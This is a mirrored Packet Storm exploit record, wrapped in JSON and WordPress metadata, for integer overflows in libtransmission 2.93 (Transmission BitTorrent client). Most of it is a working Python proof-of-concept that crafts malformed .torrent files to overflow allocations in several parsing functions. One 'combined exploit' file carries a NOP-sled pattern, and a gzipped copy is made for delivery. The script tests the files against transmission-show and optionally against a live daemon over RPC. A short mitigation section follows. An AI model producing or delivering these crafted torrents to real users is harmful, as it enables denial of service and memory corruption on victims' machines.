{“lastseen”:”2025-12-19T18:07:22″,”description”:”libtransmission versions 2.93 and below suffer from multiple integer overflows. A remote attacker could create a specially crafted .torrent file which may be small when compressed that exploits these overflows when a victim loads it via Transmission or…”,”published”:”2025-12-19T00:00:00″,”modified”:”2025-12-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 libtransmission 2.93 Integer Overflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:213137″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2018-10756″,”CVE-2018-10757″,”CVE-2018-10758″],”sourceData”:”=============================================================================================================================================\\n | # Title : libtransmission 2.93(Transmission BitTorrent Client) Allow Memory Corruption via Malicious Torrent Files |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/transmission |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212492\/ \\n \\n [+] Summary : Integer Overflow Vulnerabilities in libtransmission (Transmission BitTorrent Client) Allow Memory Corruption via Malicious Torrent Files\\n Multiple integer overflow vulnerabilities were discovered in libtransmission, the core library of the open-source Transmission BitTorrent client. \\n \\t\\t\\t The vulnerabilities reside in memory allocation wrapper macros (tr_new, tr_new0, tr_renew) and related functions used during torrent file parsing. \\n \\t\\t\\t These flaws could allow an attacker to craft a malicious torrent file that, when loaded by Transmission, triggers memory corruption, \\n \\t\\t\\t potentially leading to application crashes, denial of service, or arbitrary code execution.\\n \\n [+] Key Vulnerabilities:\\n \\n Unsafe Allocation Macros: The tr_new, tr_new0, and tr_renew macros multiply element counts by sizeof(type) without checking for integer overflow, leading to undersized memory allocations.\\n \\n Affected Parsing Functions: The overflow-prone macros are used in critical parsing functions: parseFiles, getannounce, geturllist, and tr_metainfoParseImpl.\\n \\n Missing Checks in containerReserve: The containerReserve function fails to validate against integer overflow or allocation failure.\\n \\n Signed Integer in tr_sha1: The tr_sha1 function uses a signed int for length parameters instead of size_t, risking memory corruption with very large torrents.\\n \\n [+] Impact:\\n A remote attacker could create a specially crafted .torrent file (which may be small when compressed) that exploits these overflows when a victim loads it via Transmission or its command-line interface (transmission-cli). Successful exploitation could compromise the stability and security of the client.\\n \\n Proof of Concept:\\n \\n The report includes pyhthon scripts to generate malicious torrent files that demonstrate the overflows on both 32-bit and 64-bit systems.\\n \\n [+] POC :\\t\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n libtransmission Integer Overflow Exploit – Proof of Concept\\n CVE-2018-10756, CVE-2018-10757, CVE-2018-10758\\n \\n This PoC demonstrates multiple integer overflow vulnerabilities\\n in Transmission BitTorrent client versions \\u003c= 2.93.\\n \\n Tested on: Transmission 2.92 (Ubuntu 18.04, 32-bit)\\n \\n by indoushka\\n \\”\\”\\”\\n \\n import struct\\n import sys\\n import os\\n import gzip\\n import subprocess\\n import tempfile\\n import time\\n import threading\\n from pathlib import Path\\n \\n def print_banner():\\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 libtransmission Integer Overflow Exploit PoC \u2551\\n \u2551 Transmission \\u003c= 2.93 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n class TorrentExploit:\\n def __init__(self, target_arch=32):\\n self.arch = target_arch\\n \\n def create_heap_overflow_files(self):\\n \\”\\”\\”\\n Trigger overflow in parseFiles():\\n inf-\\u003efiles = tr_new0(tr_file, inf-\\u003efileCount)\\n \\n On 32-bit: fileCount * sizeof(tr_file) overflows\\n Allocates small buffer but writes large amount of data\\n \\”\\”\\”\\n print(\\”[*] Creating heap overflow via file list…\\”)\\n \\n # Create torrent with massive file list\\n # Each file entry: d6:lengthi\\u003clen\\u003ee4:pathl\\u003cpath\\u003eee\\n \\n torrent = b\\”d\\”\\n torrent += b\\”4:infod\\”\\n torrent += b\\”4:name12:exploit_torrent\\”\\n torrent += b\\”12:piece lengthi16384e\\”\\n torrent += b\\”6:pieces20:\\” + (b\\”A\\” * 20) # Single piece hash\\n \\n # Start files list\\n torrent += b\\”5:filesl\\”\\n \\n # Add legitimate files first (2 real files)\\n torrent += b\\”d6:lengthi1024e4:pathl9:file1.txtee\\”\\n torrent += b\\”d6:lengthi1024e4:pathl9:file2.txtee\\”\\n \\n # Now add massive number of minimal file entries\\n # \\”de\\” = empty dictionary, smallest possible entry\\n # This creates list entries without allocating much data\\n if self.arch == 32:\\n # For 32-bit: aim for allocation size ~0x20\\n # sizeof(tr_file) = 32 bytes (0x20)\\n # We want: fileCount * 0x20 = 0x800000020 (overflows to 0x20)\\n # So fileCount = 0x40000001 = 1073741825\\n # But we’ll use smaller value for PoC\\n empty_count = 10000 # Reduced for PoC, real exploit would use millions\\n else:\\n empty_count = 100000\\n \\n torrent += b\\”de\\” * empty_count\\n \\n torrent += b\\”e\\” # End files list\\n torrent += b\\”e\\” # End info dict\\n torrent += b\\”e\\” # End torrent\\n \\n return torrent\\n \\n def create_announce_list_overflow(self):\\n \\”\\”\\”\\n Trigger overflow in getannounce():\\n trackers = tr_new0(tr_tracker_info, n)\\n \\”\\”\\”\\n print(\\”[*] Creating announce-list overflow…\\”)\\n \\n torrent = b\\”d\\”\\n torrent += b\\”4:infod\\”\\n torrent += b\\”4:name6:testme\\”\\n torrent += b\\”12:piece lengthi16384e\\”\\n torrent += b\\”6:pieces20:\\” + (b\\”B\\” * 20)\\n torrent += b\\”5:filesld6:lengthi1e4:pathl4:fileeee\\”\\n \\n # Add massive announce-list\\n torrent += b\\”13:announce-listl\\”\\n \\n # Each tier: l[url]e\\n # We’ll create many tiers with few trackers each\\n for i in range(5000): # Reduced for PoC\\n torrent += b\\”l\\”\\n torrent += b\\”6:string\\” # Minimal URL\\n torrent += b\\”e\\”\\n \\n torrent += b\\”e\\” # End announce-list\\n torrent += b\\”e\\” # End info\\n torrent += b\\”e\\” # End torrent\\n \\n return torrent\\n \\n def create_pieces_overflow(self):\\n \\”\\”\\”\\n Trigger overflow in tr_metainfoParseImpl():\\n inf-\\u003epieces = tr_new0(tr_piece, inf-\\u003epieceCount)\\n \\n pieceCount = pieces_length \/ 20\\n Make pieces_length huge but divisible by 20\\n \\”\\”\\”\\n print(\\”[*] Creating pieces array overflow…\\”)\\n \\n # For 32-bit: pieceCount * sizeof(tr_piece) should overflow\\n # sizeof(tr_piece) = ? (likely at least 16 bytes)\\n \\n torrent = b\\”d\\”\\n torrent += b\\”4:infod\\”\\n torrent += b\\”4:name8:bigpiece\\”\\n torrent += b\\”12:piece lengthi16384e\\”\\n torrent += b\\”5:filesld6:lengthi1e4:pathl4:fileeee\\”\\n \\n # Pieces field: \\u003clength\\u003e:\\u003cdata\\u003e\\n # We need total length that when divided by 20 gives overflow\\n \\n if self.arch == 32:\\n # Want: (length\/20) * sizeof(tr_piece) to overflow\\n # Let’s use length = 0xFFFFFFF * 20\\n piece_data = b\\”C\\” * (10000) # Reduced for PoC\\n else:\\n piece_data = b\\”D\\” * 1000000\\n \\n pieces_len = len(piece_data)\\n torrent += b\\”6:pieces\\” + str(pieces_len).encode() + b\\”:\\” + piece_data\\n torrent += b\\”e\\” # End info\\n torrent += b\\”e\\” # End torrent\\n \\n return torrent\\n \\n def create_webseeds_overflow(self):\\n \\”\\”\\”\\n Trigger overflow in geturllist():\\n inf-\\u003ewebseeds = tr_new0(char*, n)\\n \\”\\”\\”\\n print(\\”[*] Creating webseeds overflow…\\”)\\n \\n torrent = b\\”d\\”\\n torrent += b\\”4:infod\\”\\n torrent += b\\”4:name7:webseed\\”\\n torrent += b\\”12:piece lengthi16384e\\”\\n torrent += b\\”6:pieces20:\\” + (b\\”E\\” * 20)\\n torrent += b\\”5:filesld6:lengthi1e4:pathl4:fileeee\\”\\n \\n # Add url-list (webseeds)\\n torrent += b\\”8:url-listl\\”\\n \\n # Add many URL entries\\n for i in range(10000): # Reduced for PoC\\n torrent += b\\”18:http:\/\/example.com\/\\”\\n torrent += str(i).encode()\\n \\n torrent += b\\”e\\” # End url-list\\n torrent += b\\”e\\” # End info\\n torrent += b\\”e\\” # End torrent\\n \\n return torrent\\n \\n def create_combined_exploit(self):\\n \\”\\”\\”\\n Combine multiple overflow vectors for higher success rate\\n \\”\\”\\”\\n print(\\”[*] Creating combined exploit torrent…\\”)\\n \\n # Build a torrent that triggers multiple overflows\\n torrent = b\\”d\\”\\n \\n # Info dictionary\\n torrent += b\\”4:infod\\”\\n torrent += b\\”4:name13:combined_exploit\\”\\n torrent += b\\”12:piece lengthi65536e\\”\\n \\n # Pieces – first overflow vector\\n # Use crafted pieces length\\n evil_pieces = b\\”\\”\\n # We’ll embed some pattern to detect in memory\\n pattern = b\\”DEADBEEF\\” * 100\\n evil_pieces += pattern\\n \\n # Make it look like valid SHA1 hashes (20 bytes each)\\n while len(evil_pieces) \\u003c 20000:\\n evil_pieces += b\\”\\\\x90\\” * 20 # NOP sled-like\\n \\n torrent += b\\”6:pieces\\” + str(len(evil_pieces)).encode() + b\\”:\\” + evil_pieces\\n \\n # Files – second overflow vector\\n torrent += b\\”5:filesl\\”\\n \\n # Add some real files\\n for i in range(5):\\n torrent += b\\”d6:lengthi\\” + str(1024 + i).encode() + b\\”e\\”\\n torrent += b\\”4:pathl\\”\\n torrent += b\\”8:file\\” + str(i).encode() + b\\”.txt\\”\\n torrent += b\\”ee\\”\\n \\n # Add many empty dicts to bloat the list count\\n torrent += b\\”de\\” * 5000\\n \\n torrent += b\\”e\\” # End files\\n \\n # Announce-list – third overflow vector\\n torrent += b\\”13:announce-listl\\”\\n \\n # Add many tracker tiers\\n for tier in range(100):\\n torrent += b\\”l\\”\\n for tracker in range(10):\\n torrent += b\\”20:http:\/\/tracker\\” + str(tier).encode() + b\\”.com\\”\\n torrent += b\\”e\\”\\n \\n torrent += b\\”e\\” # End announce-list\\n \\n # url-list – fourth overflow vector\\n torrent += b\\”8:url-listl\\”\\n for i in range(100):\\n torrent += b\\”25:http:\/\/webseed\\” + str(i).encode() + b\\”.com\/\\”\\n torrent += b\\”e\\”\\n \\n torrent += b\\”e\\” # End info\\n torrent += b\\”e\\” # End torrent\\n \\n return torrent\\n \\n def test_with_transmission_show(torrent_data, description):\\n \\”\\”\\”\\n Test the exploit torrent with transmission-show\\n This is safer than running the full client\\n \\”\\”\\”\\n print(f\\”\\\\n[+] Testing: {description}\\”)\\n print(f\\” Torrent size: {len(torrent_data)} bytes\\”)\\n \\n # Create temporary torrent file\\n with tempfile.NamedTemporaryFile(mode=’wb’, suffix=’.torrent’, delete=False) as f:\\n f.write(torrent_data)\\n torrent_path = f.name\\n \\n try:\\n # Use transmission-show to parse the torrent\\n # This will trigger the parsing vulnerabilities\\n print(\\” Running transmission-show…\\”)\\n \\n start_time = time.time()\\n result = subprocess.run(\\n [‘transmission-show’, torrent_path],\\n capture_output=True,\\n text=True,\\n timeout=5\\n )\\n elapsed = time.time() – start_time\\n \\n print(f\\” Command took: {elapsed:.2f} seconds\\”)\\n \\n if result.returncode != 0:\\n print(\\” [!] transmission-show crashed or failed!\\”)\\n print(f\\” Return code: {result.returncode}\\”)\\n \\n # Check for segfault\\n if result.returncode \\u003c 0:\\n print(f\\” Signal: {-result.returncode}\\”)\\n \\n # Check stderr for clues\\n if result.stderr:\\n lines = result.stderr.split(‘\\\\n’)\\n for line in lines[-5:]: # Last 5 lines\\n if line.strip():\\n print(f\\” Error: {line}\\”)\\n \\n return True # Exploit likely triggered\\n \\n else:\\n print(\\” [\u2713] transmission-show completed normally\\”)\\n # Print some output\\n lines = result.stdout.split(‘\\\\n’)\\n for line in lines[:10]: # First 10 lines\\n if line.strip():\\n print(f\\” {line}\\”)\\n \\n return False\\n \\n except subprocess.TimeoutExpired:\\n print(\\” [!] transmission-show timed out (possible hang)\\”)\\n return True\\n \\n except FileNotFoundError:\\n print(\\” [!] transmission-show not found in PATH\\”)\\n print(\\” Install with: sudo apt-get install transmission-cli\\”)\\n return False\\n \\n except Exception as e:\\n print(f\\” [!] Exception: {e}\\”)\\n return False\\n \\n finally:\\n # Clean up\\n try:\\n os.unlink(torrent_path)\\n except:\\n pass\\n \\n def test_with_transmission_daemon(torrent_data):\\n \\”\\”\\”\\n Test with actual transmission-daemon via RPC\\n WARNING: This could crash the daemon!\\n \\”\\”\\”\\n print(\\”\\\\n[*] Testing with transmission-daemon RPC…\\”)\\n \\n # Check if daemon is running\\n try:\\n result = subprocess.run(\\n [‘pgrep’, ‘transmission-da’],\\n capture_output=True,\\n text=True\\n )\\n \\n if result.returncode != 0:\\n print(\\” [!] transmission-daemon not running\\”)\\n print(\\” Start with: transmission-daemon\\”)\\n return\\n \\n print(\\” [\u2713] transmission-daemon is running\\”)\\n \\n except:\\n print(\\” [!] Could not check transmission-daemon status\\”)\\n return\\n \\n # Create torrent file\\n with tempfile.NamedTemporaryFile(mode=’wb’, suffix=’.torrent’, delete=False) as f:\\n f.write(torrent_data)\\n torrent_path = f.name\\n \\n try:\\n # Try to add torrent via transmission-remote\\n print(\\” Adding torrent via RPC…\\”)\\n \\n result = subprocess.run(\\n [‘transmission-remote’, ‘-a’, torrent_path],\\n capture_output=True,\\n text=True,\\n timeout=10\\n )\\n \\n if result.returncode != 0:\\n print(\\” [!] Failed to add torrent\\”)\\n if result.stderr:\\n print(f\\” Error: {result.stderr[:200]}\\”)\\n else:\\n print(\\” [\u2713] Torrent added (check daemon status)\\”)\\n \\n # Try to remove it\\n time.sleep(2)\\n subprocess.run([‘transmission-remote’, ‘-t’, ‘all’, ‘-r’],\\n capture_output=True)\\n \\n except subprocess.TimeoutExpired:\\n print(\\” [!] RPC command timed out (daemon might be crashed)\\”)\\n \\n except Exception as e:\\n print(f\\” [!] Exception: {e}\\”)\\n \\n finally:\\n try:\\n os.unlink(torrent_path)\\n except:\\n pass\\n \\n def create_demo_torrents():\\n \\”\\”\\”Create example torrents for demonstration\\”\\”\\”\\n exploit = TorrentExploit(target_arch=32)\\n \\n print(\\”[*] Creating demonstration torrents…\\”)\\n \\n # 1. Basic heap overflow\\n torrent1 = exploit.create_heap_overflow_files()\\n with open(\\”demo_overflow_files.torrent\\”, \\”wb\\”) as f:\\n f.write(torrent1)\\n print(\\” Created: demo_overflow_files.torrent\\”)\\n \\n # 2. Announce list overflow\\n torrent2 = exploit.create_announce_list_overflow()\\n with open(\\”demo_overflow_announce.torrent\\”, \\”wb\\”) as f:\\n f.write(torrent2)\\n print(\\” Created: demo_overflow_announce.torrent\\”)\\n \\n # 3. Combined exploit\\n torrent3 = exploit.create_combined_exploit()\\n with open(\\”demo_combined.torrent\\”, \\”wb\\”) as f:\\n f.write(torrent3)\\n print(\\” Created: demo_combined.torrent\\”)\\n \\n # 4. Create compressed version (for HTTP transport)\\n compressed = gzip.compress(torrent3, compresslevel=9)\\n with open(\\”demo_compressed.torrent.gz\\”, \\”wb\\”) as f:\\n f.write(compressed)\\n print(f\\” Created: demo_compressed.torrent.gz\\”)\\n print(f\\” Compression: {len(torrent3)} -\\u003e {len(compressed)} bytes\\”)\\n \\n return [torrent1, torrent2, torrent3]\\n \\n def analyze_crash():\\n \\”\\”\\”\\n Provide instructions for analyzing crashes with gdb\\n \\”\\”\\”\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”CRASH ANALYSIS INSTRUCTIONS\\”)\\n print(\\”=\\”*60)\\n \\n print(\\”\\”\\”\\n If transmission-show crashes, you can analyze it with gdb:\\n \\n 1. Create the exploit torrent:\\n $ python3 exploit_poc.py create\\n \\n 2. Run with gdb:\\n $ gdb –args transmission-show demo_combined.torrent\\n \\n 3. In gdb:\\n (gdb) run\\n (gdb) bt # Backtrace after crash\\n (gdb) info registers\\n (gdb) x\/20x $sp # Examine stack\\n \\n 4. For heap analysis:\\n $ valgrind –tool=memcheck transmission-show demo_combined.torrent\\n \\n The crash should occur in:\\n – parseFiles() when writing to inf-\\u003efiles[]\\n – getannounce() when processing trackers\\n – containerReserve() when reallocating variant arrays\\n \\n Look for:\\n – Heap buffer overflow warnings\\n – Invalid writes to memory\\n – Use of uninitialized values\\n \\”\\”\\”)\\n \\n def main():\\n print_banner()\\n \\n if len(sys.argv) \\u003e 1 and sys.argv[1] == \\”create\\”:\\n # Just create demo torrents\\n create_demo_torrents()\\n analyze_crash()\\n return\\n \\n print(\\”[*] Detecting system architecture…\\”)\\n \\n # Check if we’re on 32 or 64 bit\\n if sys.maxsize \\u003e 2**32:\\n print(\\” Detected: 64-bit Python\\”)\\n arch = 64\\n else:\\n print(\\” Detected: 32-bit Python\\”)\\n arch = 32\\n \\n exploit = TorrentExploit(target_arch=arch)\\n \\n print(\\”\\\\n[*] Starting exploit tests…\\”)\\n print(\\” Note: These tests are safe but may crash transmission-show\\”)\\n print(\\” Press Ctrl+C to stop at any time\\\\n\\”)\\n \\n # Test each exploit vector\\n vectors = [\\n (\\”Heap overflow via files\\”, exploit.create_heap_overflow_files),\\n (\\”Announce-list overflow\\”, exploit.create_announce_list_overflow),\\n (\\”Pieces array overflow\\”, exploit.create_pieces_overflow),\\n (\\”Webseeds overflow\\”, exploit.create_webseeds_overflow),\\n (\\”Combined exploit\\”, exploit.create_combined_exploit),\\n ]\\n \\n crashes = 0\\n tests = 0\\n \\n for name, creator in vectors:\\n torrent = creator()\\n if test_with_transmission_show(torrent, name):\\n crashes += 1\\n tests += 1\\n \\n # Pause between tests\\n if tests \\u003c len(vectors):\\n time.sleep(1)\\n \\n print(f\\”\\\\n[+] Results: {crashes} crashes out of {tests} tests\\”)\\n \\n if crashes \\u003e 0:\\n print(\\”[!] VULNERABLE: Integer overflows confirmed!\\”)\\n print(\\”\\\\n[*] Creating demonstration torrents…\\”)\\n demo_torrents = create_demo_torrents()\\n \\n # Optional: Test with daemon (more dangerous)\\n response = input(\\”\\\\nTest with transmission-daemon? (y\/N): \\”)\\n if response.lower() == ‘y’:\\n test_with_transmission_daemon(demo_torrents[2])\\n \\n analyze_crash()\\n \\n else:\\n print(\\”[\u2713] No crashes detected (may be patched or 64-bit)\\”)\\n print(\\”\\\\nNote: On 64-bit systems, larger values are needed\\”)\\n print(\\” Try on a 32-bit system for better results\\”)\\n \\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”MITIGATION RECOMMENDATIONS:\\”)\\n print(\\”=\\”*60)\\n print(\\”\\”\\”\\n 1. Patch libtransmission with overflow checks:\\n – Add overflow detection to tr_new\/tr_new0 macros\\n – Use calloc or checked multiplication\\n \\n 2. Update to Transmission \\u003e= 2.94\\n \\n 3. Temporary workarounds:\\n – Limit maximum torrent file size\\n – Use seccomp\/sandboxing\\n – Run transmission with memory limits (ulimit -v)\\n \\n Example patch for tr_new macro:\\n #define tr_new(struct_type, n_structs) \\\\\\\\\\n ((struct_type*)((SIZE_MAX \/ sizeof(struct_type)) \\u003e= (size_t)(n_structs) ? \\\\\\\\\\n tr_malloc(sizeof(struct_type) * (size_t)(n_structs)) : NULL))\\n \\”\\”\\”)\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(\\”\\\\n\\\\n[*] Exploit test interrupted by user\\”)\\n sys.exit(0)\\n except Exception as e:\\n print(f\\”\\\\n[!] Error: {e}\\”)\\n import traceback\\n traceback.print_exc()\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213137″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”baseScore”:9.8,”baseSeverity”:”CRITICAL”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/213137\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-19T18:07:22″,”description”:”libtransmission versions 2.93 and below suffer from multiple integer overflows. A remote attacker could create a specially crafted .torrent file which may be small when…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-32295","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n